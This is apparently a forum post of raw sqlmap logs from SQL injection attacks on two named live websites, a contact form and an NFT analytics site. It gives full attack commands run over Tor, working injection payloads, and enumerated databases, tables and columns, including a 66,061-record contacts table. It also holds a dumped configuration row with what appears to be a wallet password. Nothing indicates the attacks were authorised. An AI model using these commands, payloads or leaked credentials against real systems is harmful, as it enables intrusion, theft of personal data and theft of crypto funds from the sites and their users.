[03:29:08] [INFO] resumed: bCRM_groups
[03:29:08] [INFO] resumed: bCRM_open_rates
[03:29:08] [INFO] resumed: blender_countries
[03:29:08] [INFO] resumed: blender_options
[03:29:08] [INFO] resumed: blender_states_provinces
[03:29:08] [INFO] resumed: blender_templates
[03:29:08] [INFO] resumed: blender_templates_types
Database: cathedra_com
[31 tables]
+------------------------------+
| bCMS_applications            |
| bCMS_applications_custom     |
| bCMS_applications_listing    |
| bCMS_categories              |
| bCMS_changes                 |
| bCMS_click_throughs          |
| bCMS_comments                |
| bCMS_contents                |
| bCMS_contents_to_categories  |
| bCMS_contents_to_structures  |
| bCMS_elements                |
| bCMS_gallery_albums          |
| bCMS_gallery_images          |
| bCMS_hootsuite_access_tokens |
| bCMS_pages                   |
| bCMS_parameters              |
| bCMS_permissions             |
| bCMS_related_links           |
| bCMS_social_media_messages   |
| bCMS_structures              |
| bCRM_contacts                |
| bCRM_contacts_to_groups      |
| bCRM_details                 |
| bCRM_disseminations          |
| bCRM_groups                  |
| bCRM_open_rates              |
| blender_countries            |
| blender_options              |
| blender_states_provinces     |
| blender_templates            |
| blender_templates_types      |
+------------------------------+

[03:29:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.cathedra.com'

[*] ending @ 03:29:08 /2025-11-14/

(myenv) root@E02S29:~# sqlmap -u "https://www.cathedra.com/contact/index.php"   --data="comments=555&email=testing%40example.com&email_list=Email%20List&full_name=dTjdNQKi&g-r    ecaptcha-response=1&phone_number=555-666-0606&submit=Submit"   -p email_list    --level=3   --risk=3   --batch --tamper=space2comment --threads=10 -D cathedra_com -T bCRM_cont    acts --count
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.10#pip}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state an    d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:30:07 /2025-11-14/

[03:30:07] [INFO] loading tamper module 'space2comment'
[03:30:07] [INFO] resuming back-end DBMS 'mysql'
[03:30:07] [INFO] testing connection to the target URL
[03:30:09] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email_list (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: comments=555&email=testing@example.com&email_list=Email List' AND (SELECT 8722 FROM (SELECT(SLEEP(5)))mQpy) AND 'pGeg'='pGeg&full_name=dTjdNQKi&g-recaptcha-respon    se=1&phone_number=555-666-0606&submit=Submit
---
[03:30:09] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[03:30:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[03:30:11] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[03:31:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:31:21] [INFO] adjusting time delay to 4 seconds due to good response times
66061
Database: cathedra_com
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| bCRM_contacts | 66061   |
+---------------+---------+

(myenv) root@E02S29:~# sqlmap -u "https://www.cathedra.com/contact/index.php"   --data="comments=555&email=testing%40example.com&email_list=Email%20List&full_name=dTjdNQKi&g-r    ecaptcha-response=1&phone_number=555-666-0606&submit=Submit"   -p email_list    --level=3   --risk=3   --batch --tamper=space2comment --threads=10 -D cathedra_com -T bCRM_cont    acts --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.10#pip}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state an    d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:51:04 /2025-11-14/

[04:51:04] [INFO] loading tamper module 'space2comment'
[04:51:04] [INFO] resuming back-end DBMS 'mysql'
[04:51:04] [INFO] testing connection to the target URL
[04:51:07] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email_list (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: comments=555&email=testing@example.com&email_list=Email List' AND (SELECT 8722 FROM (SELECT(SLEEP(5)))mQpy) AND 'pGeg'='pGeg&full_name=dTjdNQKi&g-recaptcha-respon    se=1&phone_number=555-666-0606&submit=Submit
---
[04:51:07] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[04:51:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:51:07] [INFO] fetching columns for table 'bCRM_contacts' in database 'cathedra_com'
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[04:51:09] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[04:51:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[04:52:21] [INFO] adjusting time delay to 4 seconds due to good response times
4
[04:52:30] [INFO] retrieved: contact_id
[04:56:43] [INFO] retrieved: int(10) unsigned
[05:03:40] [INFO] retrieved: user_id
[05:06:41] [INFO] retrieved: int(10) unsigned
[05:13:32] [INFO] retrieved: parent_id
[05:17:26] [INFO] retrieved: int(10) unsigned
[05:24:16] [INFO] retrieved: title
[05:26:23] [INFO] retrieved: varchar(6)
[05:30:35] [INFO] retrieved: first_name
[05:34:43] [INFO] retrieved: varchar(48)
[05:39:24] [INFO] retrieved: last_name
[05:43:12] [INFO] retrieved: varchar(48)
[05:47:52] [INFO] retrieved: gender
[05:50:13] [INFO] retrieved: enum('Male','Female')
[05:58:52] [INFO] retrieved: company
[06:01:43] [INFO] retrieved: varchar(64)
[06:06:24] [INFO] retrieved: address1
[06:09:14] [INFO] retrieved: varchar(32)
[06:13:41] [INFO] retrieved: address2
[06:16:37] [INFO] retrieved: varchar(32)
[06:21:03] [INFO] retrieved: city_to
[06:24:42] [ERROR] invalid character detected. retrying..
[06:24:42] [WARNING] increasing time delay to 5 seconds
wn
[06:25:47] [INFO] retrieved: varchar(24)
[06:31:00] [INFO] retrieved: state_province
[06:37:37] [INFO] retrieved: varchar(24)
[06:42:49] [INFO] retrieved: country
[06:46:08] [INFO] retrieved: varchar(32)
[06:51:09] [INFO] retrieved: zip_postal
[06:56:25] [INFO] retrieved: varchar(8)
[07:01:13] [INFO] retrieved: phone_day
[07:05:48] [INFO] retrieved: varchar(16)
[07:10:55] [INFO] retrieved: phone
[07:13:37] [INFO] adjusting time delay to 4 seconds due to good response times
_eve
[07:15:21] [INFO] retrieved: varchar(16)
[07:19:48] [INFO] retrieved: mobile
[07:22:08] [INFO] retrieved: varchar(16)
[07:26:35] [INFO] retrieved: fax
[07:27:52] [INFO] retrieved: varchar(16)
[07:32:18] [INFO] retrieved: website
[07:34:58] [INFO] retrieved: varchar(64)
[07:39:37] [INFO] retrieved: email
[07:41:28] [INFO] retrieved: varchar(64)
[07:46:08] [INFO] retrieved: roles
[07:48:14] [INFO] retrieved: text
[07:50:06] [INFO] retrieved: subscribe_lists
[07:56:16] [ERROR] invalid character detected. retrying..
[07:56:16] [WARNING] increasing time delay to 5 seconds

[07:56:20] [INFO] retrieved: text
[07:58:28] [INFO] retrieved: comments
[08:02:08] [INFO] retrieved: text
[08:04:14] [INFO] retrieved: date_stamp
[08:08:52] [INFO] retrieved: datetime
Database: cathedra_com
Table: bCRM_contacts
[24 columns]
+-----------------+-----------------------+
| Column          | Type                  |
+-----------------+-----------------------+
| address1        | varchar(32)           |
| address2        | varchar(32)           |
| city_town       | varchar(24)           |
| comments        | text                  |
| company         | varchar(64)           |
| contact_id      | int(10) unsigned      |
| country         | varchar(32)           |
| date_stamp      | datetime              |
| email           | varchar(64)           |
| fax             | varchar(16)           |
| first_name      | varchar(48)           |
| gender          | enum('Male','Female') |
| last_name       | varchar(48)           |
| mobile          | varchar(16)           |
| parent_id       | int(10) unsigned      |
| phone_day       | varchar(16)           |
| phone_eve       | varchar(16)           |
| roles           | text                  |
| state_province  | varchar(24)           |
| subscribe_lists | text                  |
| title           | varchar(6)            |
| user_id         | int(10) unsigned      |
| website         | varchar(64)           |
| zip_postal      | varchar(8)            |
+-----------------+-----------------------+

[08:12:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.cathedra.com'

MrDark · 16.11.2025

Crypto / web3 / nft https://stargaze-live.io

Код:

sqlmap -u "https://stargaze-live.io/util.php"   --data="collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=test"   -p trait   --dbms=mysql   --batch   --dbs   --tor   --timeout=30

sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sganalytics
[*] sys

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
[5645 tables]
+------------------------------------------------------------------+
| all_collections                                                  |
| all_daos                                                         |
| atlas_collab_potion_burn                                         |
| atlas_collab_sent_nfts                                           |
| bingo_board                                                      |
| bots_sglive                                                      |
| burned_out_collections                                           |
| collections                                                      |
| config                                                           |
| digitz_mintparty777                                              |
| digitz_wl                                                        |
| discord_streaming_clients                                        |
| discord_streaming_tiers                                          |
| hashmatch                                                        |
| hashmatch_config                                                 |
| historic_usd_price                                               |
| issues_log                                                       |
| jobqueue                                                         |
| livedata                                                         |
| minted_to_fix                                                    |
| mintparty777                                                     |
| names_ownership                                                  |
| nft_ownership                                                    |
| nfts                                                             |
| nfts_                                                            |
| nfts_0bych0pch0p                                                 |
| nfts_0bych0pch0p_rarity                                          |
| nfts_1001inhabitants                                             |
| nfts_1001inhabitants_rarity                                      |
| nfts_100safesleep                                                |
| nfts_100safesleep_rarity                                         |
| nfts_114shut                                                     |
| nfts_114shut_rarity                                              |
| nfts_1taliandude                                                 |
| nfts_1taliandude_rarity                                          |
| nfts_1thecreation                                                |
| nfts_3daliens                                                    |
| nfts_3dboxnft                                                    |
| nfts_3dboxnft_rarity                                             |

And many other nft names...

| notification_candidates                                          |
| product                                                          |
| snipe_logs                                                       |
| snipes                                                           |
| subscriptions                                                    |
| sys_logs                                                         |
| test_jobqueue                                                    |
| test_livedata                                                    |
| test_notification_candidates                                     |
| test_transactions                                                |
| transactions                                                     |
| wallets                                                          |
| whitelist_candidates                                             |
| wl_words                                                         |
| zen_bid_bot                                                      |
| zen_bid_bot_notifications                                        |
| zen_blockchain_tools_clients                                     |
| zen_digimart_products                                            |
| zen_digimart_transactions                                        |
| zen_event_notification_register                                  |
| zen_list_bot                                                     |
| zen_mint_bot                                                     |
| zen_mint_bot_events                                              |
| zen_mint_bot_events_count                                        |
| zen_mint_bot_orders                                              |
| zen_mint_orders                                                  |
| zen_portal_addresses                                             |
| zen_portal_bids_tracker                                          |
| zen_portal_users                                                 |
| zen_sglive_user_profiles                                         |
| zen_sync_wallets                                                 |
| zen_test_zengames_leaderboard_august_2023                        |
| zen_test_zengames_leaderboard_july_2023                          |
| zen_test_zengames_overall_leaderboard                            |
| zen_tools_clients_holdings                                       |
| zen_tpk_collab_nft_burn                                          |
| zen_tpk_collab_sent_nfts                                         |
| zen_verification_config                                          |
| zen_zend_balances                                                |
| zengames_leaderboard_april_2024                                  |
| zengames_leaderboard_august_2023                                 |
| zengames_leaderboard_august_2024                                 |
| zengames_leaderboard_december_2023                               |
| zengames_leaderboard_december_2024                               |
| zengames_leaderboard_february_2024                               |
| zengames_leaderboard_january_2024                                |
| zengames_leaderboard_july_2023                                   |
| zengames_leaderboard_july_2024                                   |
| zengames_leaderboard_june_2024                                   |
| zengames_leaderboard_march_2024                                  |
| zengames_leaderboard_may_2024                                    |
| zengames_leaderboard_november_2023                               |
| zengames_leaderboard_november_2024                               |
| zengames_leaderboard_october_2023                                |
| zengames_leaderboard_october_2024                                |
| zengames_leaderboard_september_2023                              |
| zengames_leaderboard_september_2024                              |
| zengames_numbergen                                               |
| zengames_overall_leaderboard                                     |
| zengames_powerdigitz                                             |
| zenverification                                                  |
+------------------------------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: config
[1 entry]
+------------------------------------------------------------------+------------------------+-------------------------------------------------------------------------------------------------------------------------------+-------------+---------------+----------------+----------------+----------------+-----------------+----------------------------------------------+-------------------+-------------------+--------------------+---------------------+----------------------+----------------------+----------------------+---------------------------+----------------------------+----------------------------+-----------------------------+------------------------------+---------------------------------+
| highestvolumecollectionid                                        | walletp                | basecolumns                                                                                                                   | sent_txhash | btc_usd_price | atom_usd_price | osmo_usd_price | tx_last_height | stars_usd_price | digitz_wl_address                            | digitz_wl_walletp | max_subscriptions | last_indexed_block | sys_log_purge_cycle | jobqueue_purge_cycle | livedata_purge_cycle | mint_fix_last_height | max_subscriptions_premium | max_subscriptions_standard | subscription_last_run_time | max_subscriptions_unlimited | max_subscriptions_subscriber | open_edition_last_checked_block |
+------------------------------------------------------------------+------------------------+-------------------------------------------------------------------------------------------------------------------------------+-------------+---------------+----------------+----------------+----------------+-----------------+----------------------------------------------+-------------------+-------------------+--------------------+---------------------+----------------------+----------------------+----------------------+---------------------------+----------------------------+----------------------------+-----------------------------+------------------------------+---------------------------------+
| stars139hxs27d83qtqayw5jvawjlqa5xn6dg0pa2ymfljw7zdcjpyjmfq27srxl | 0ju3l3gba1307Keynes_@# | id,sys_id,collectionid,isListed,listprice,listingupdated,imgurl,rankpoints,lastsaleprice,lastlistprice,created,updated,rarity | NULL        | 95695         | 2.85           | 0.09746        | 12511597       | 0.00073686      | stars1v36eves3y79ptllhgyadcd9vdzhg7aqcyfqjmz | NULL              | 10                | 26633270           | 86400               | 259200               | 259200               | 2931370              | 25                        | 10                         | 1763264622                 | 0                           | 1                            | 26633191                        |
+------------------------------------------------------------------+------------------------+-------------------------------------------------------------------------------------------------------------------------------+-------------+---------------+----------------+----------------+----------------+-----------------+----------------------------------------------+-------------------+-------------------+--------------------+---------------------+----------------------+----------------------+----------------------+---------------------------+----------------------------+----------------------------+-----------------------------+------------------------------+---------------------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: nft_ownership
[16 columns]
+------------------+-------------+
| Column           | Type        |
+------------------+-------------+
| owner            | text        |
| collectionid     | text        |
| collectionName   | text        |
| created          | timestamp   |
| dao_contract     | text        |
| dao_name         | text        |
| id               | int         |
| listed           | text        |
| listing_contract | text        |
| stake_contract   | text        |
| staked           | text        |
| staked_to_dao    | text        |
| sys_id           | varchar(36) |
| tablename        | text        |
| tokenid          | int         |
| updated          | timestamp   |
+------------------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: hashmatch_config
[6 columns]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| close_entries | int       |
| id            | int       |
| match_source  | text      |
| target_block  | int       |
| tie_breaker   | text      |
| updated       | timestamp |
+---------------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: all_collections
[26 columns]
+------------------+-------------+
| Column           | Type        |
+------------------+-------------+
| description      | text        |
| name             | text        |
| base_token_uri   | text        |
| code_id          | int         |
| collection_image | text        |
| collectionid     | text        |
| contract         | text        |
| created          | timestamp   |
| created_height   | int         |
| creator          | text        |
| guid             | varchar(40) |
| id               | int         |
| instantiator     | text        |
| is_open_edition  | varchar(3)  |
| mint_end_time    | text        |
| mint_price       | float       |
| mint_start_time  | text        |
| minter           | text        |
| num_tokens       | int         |
| rarity_tablename | text        |
| royalties        | float       |
| sg721_code_id    | int         |
| symbol           | varchar(30) |
| sys_id           | varchar(40) |
| tablename        | text        |
| traits           | text        |
+------------------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: all_daos
[10 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| admin            | text     |
| description      | text     |
| name             | text     |
| collectionid     | text     |
| created          | datetime |
| dao_url          | text     |
| id               | int      |
| image_url        | text     |
| proposal_modules | text     |
| voting_module    | text     |
+------------------+----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: bingo_board
[4 columns]
+---------+-----------+
| Column  | Type      |
+---------+-----------+
| id      | int       |
| prize   | text      |
| tokenid | int       |
| updated | timestamp |
+---------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: bots_sglive
[10 columns]
+---------------------+-----------+
| Column              | Type      |
+---------------------+-----------+
| channelid           | text      |
| collectionid        | text      |
| created             | timestamp |
| created_by_userid   | text      |
| created_by_username | text      |
| id                  | int       |
| last_served         | timestamp |
| served_count        | int       |
| serverid            | text      |
| servername          | text      |
+---------------------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: collections
[20 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| description      | text         |
| name             | varchar(100) |
| code_id          | int          |
| collection_image | text         |
| collectionid     | varchar(100) |
| contract         | varchar(100) |
| created          | timestamp    |
| created_height   | int          |
| creator          | varchar(100) |
| id               | int          |
| instantiator     | varchar(100) |
| mint_price       | float        |
| mint_start_time  | int          |
| minter           | varchar(100) |
| num_tokens       | int          |
| royalties        | int          |
| sg721_code_id    | int          |
| symbol           | varchar(100) |
| traits           | text         |
| updated          | timestamp    |
+------------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: digitz_mintparty777
[5 columns]
+-----------+-----------+
| Column    | Type      |
+-----------+-----------+
| owner     | text      |
| id        | int       |
| mint_time | text      |
| tokenid   | int       |
| updated   | timestamp |
+-----------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: digitz_wl
[14 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| source        | text        |
| status        | varchar(20) |
| address       | text        |
| created       | int         |
| id            | int         |
| is_project_wl | varchar(5)  |
| is_zenog      | varchar(5)  |
| memo          | text        |
| project       | text        |
| sent_txhash   | text        |
| stars_sent    | varchar(3)  |
| updated       | timestamp   |
| userid        | text        |
| username      | text        |
+---------------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: hashmatch
[13 columns]
+--------------------+-------------+
| Column             | Type        |
+--------------------+-------------+
| status             | varchar(20) |
| close_entry_block  | int         |
| created            | int         |
| creation_block     | int         |
| entries            | text        |
| entries_message_id | text        |
| first_x_numbers    | int         |
| game_channel_id    | text        |
| id                 | int         |
| prize              | text        |
| target_block       | int         |
| updated            | timestamp   |
| winners            | text        |
+--------------------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: hashmatch_config
[6 columns]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| close_entries | int       |
| id            | int       |
| match_source  | text      |
| target_block  | int       |
| tie_breaker   | text      |
| updated       | timestamp |
+---------------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: livedata
[17 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| name          | text         |
| buyer         | text         |
| collectionid  | text         |
| date_inserted | timestamp    |
| denom         | text         |
| id            | int          |
| imgurl        | text         |
| lister        | text         |
| minter        | text         |
| price         | float        |
| reserve_price | float        |
| seller        | text         |
| sender        | text         |
| tokenid       | int          |
| txhash        | text         |
| txtimestamp   | text         |
| txtype        | varchar(100) |
+---------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: names_ownership
[15 columns]
+----------------------+-----------+
| Column               | Type      |
+----------------------+-----------+
| name                 | text      |
| owner                | text      |
| associated_address   | text      |
| created              | timestamp |
| discord              | text      |
| discord_verified     | text      |
| id                   | int       |
| image_nft_collection | text      |
| image_nft_tokenid    | text      |
| profileimageurl      | text      |
| twitter              | text      |
| twitter_verified     | text      |
| updated              | timestamp |
| website              | text      |
| website_verified     | text      |
+----------------------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: nft_ownership
[16 columns]
+------------------+-------------+
| Column           | Type        |
+------------------+-------------+
| owner            | text        |
| collectionid     | text        |
| collectionName   | text        |
| created          | timestamp   |
| dao_contract     | text        |
| dao_name         | text        |
| id               | int         |
| listed           | text        |
| listing_contract | text        |
